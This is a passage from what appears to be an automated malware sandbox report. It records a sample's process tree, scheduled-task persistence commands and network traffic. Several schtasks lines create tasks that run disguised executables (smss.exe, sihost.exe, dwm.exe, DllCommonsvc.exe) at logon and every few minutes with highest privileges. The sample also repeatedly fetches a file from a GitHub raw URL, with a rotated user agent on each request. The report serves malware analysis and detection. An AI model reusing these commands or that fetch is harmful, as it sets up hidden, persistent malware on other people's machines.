        Suspicious use of AdjustPrivilegeToken
        
        PID:3448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tiHtiEmsSK.bat"
        31⤵
        
        PID:2540
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        32⤵
        
        PID:1940
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1424
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GKRF07RVHS.bat"
        33⤵
        
        PID:1480
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        34⤵
        
        PID:984
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        34⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\providercommon\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\providercommon\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\providercommon\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 7 /tr "'C:\Windows\Media\Garden\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Windows\Media\Garden\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Windows\Media\Garden\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\All Users\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2636

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

71.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.159.190.20.in-addr.arpa

IN PTR

Response
DNS

181.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

181.129.81.91.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

DllCommonsvc.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:24:58 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4257-LON
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1734891898.381080,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 506c501393902849478dd441d33f3f2028f2c7de
Expires: Sun, 22 Dec 2024 18:29:58 GMT
Source-Age: 176
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:25:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600040-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1734891909.536329,VS0,VE2
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 7b8856fede29c76189695744b48cdc4e089bb907
Expires: Sun, 22 Dec 2024 18:30:08 GMT
Source-Age: 176
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

86.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.49.80.91.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:25:14 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600059-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891915.600499,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 25b9487feb38a3e819eca341129aa88793cca31c
Expires: Sun, 22 Dec 2024 18:30:14 GMT
Source-Age: 182
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:25:22 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4272-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891923.997342,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c4f1f824259a3ecb5361314db95f8353713935d8
Expires: Sun, 22 Dec 2024 18:30:22 GMT
Source-Age: 201
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:25:33 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600029-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1734891934.604811,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6964d4a4c3d22239f1a2446d029bf57be08f9dea
Expires: Sun, 22 Dec 2024 18:30:33 GMT
Source-Age: 201
DNS

81.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.144.22.2.in-addr.arpa

IN PTR

Response

81.144.22.2.in-addr.arpa

IN PTR

a2-22-144-81deploystaticakamaitechnologiescom
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:25:49 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600089-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891949.052721,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 8eb0c58f83ce2c1da58a27358fe5557ae7e8a86e
Expires: Sun, 22 Dec 2024 18:30:49 GMT
Source-Age: 217
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:25:58 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4264-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891958.451461,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d31d315d43357cc81437970140827d27f2c2b780
Expires: Sun, 22 Dec 2024 18:30:58 GMT
Source-Age: 236
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:26:11 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600037-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891972.801642,VS0,VE2
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: dbcea7678fde803c0b396f13a98586e8e93cb7d7
Expires: Sun, 22 Dec 2024 18:31:11 GMT
Source-Age: 239
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:26:17 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420137-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891978.603472,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: add13d842b2c30b38aad64a5c10705b1c5db9b00
Expires: Sun, 22 Dec 2024 18:31:17 GMT
Source-Age: 255
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:26:24 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4230-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891984.412823,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c623dcfb2d58e865c65e08b80e2ff796f5145575
Expires: Sun, 22 Dec 2024 18:31:24 GMT
Source-Age: 262
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:26:31 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4281-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734891992.736178,VS0,VE5
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 3bdc2456b178f132c09f3b2769452eb398217466
Expires: Sun, 22 Dec 2024 18:31:31 GMT
Source-Age: 269
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 19E9:F25E4:2159C1:2CD3F2:67685058
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:26:43 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420130-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734892003.117987,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 32e3221f86cb7ddab130397d84aec9b65beae02b
Expires: Sun, 22 Dec 2024 18:31:43 GMT
Source-Age: 281
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:26:51 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600056-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1734892011.211921,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f36701c33db66bbcf3d8b24bab05f1679021a8fd
Expires: Sun, 22 Dec 2024 18:31:51 GMT
Source-Age: 279
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

DllCommonsvc.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3CC3:302B56:445C3B:5AD891:6768504B
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 18:27:04 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600031-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734892024.289711,VS0,VE2
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 751c14bfb44bebe13d7cdc000c8d6690c848c509
Expires: Sun, 22 Dec 2024 18:32:04 GMT
Source-Age: 292
DNS

174.117.168.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.117.168.52.in-addr.arpa

IN PTR

Response

185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

849 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

DllCommonsvc.exe

914 B
5.1kB
8
9

HTTP Request

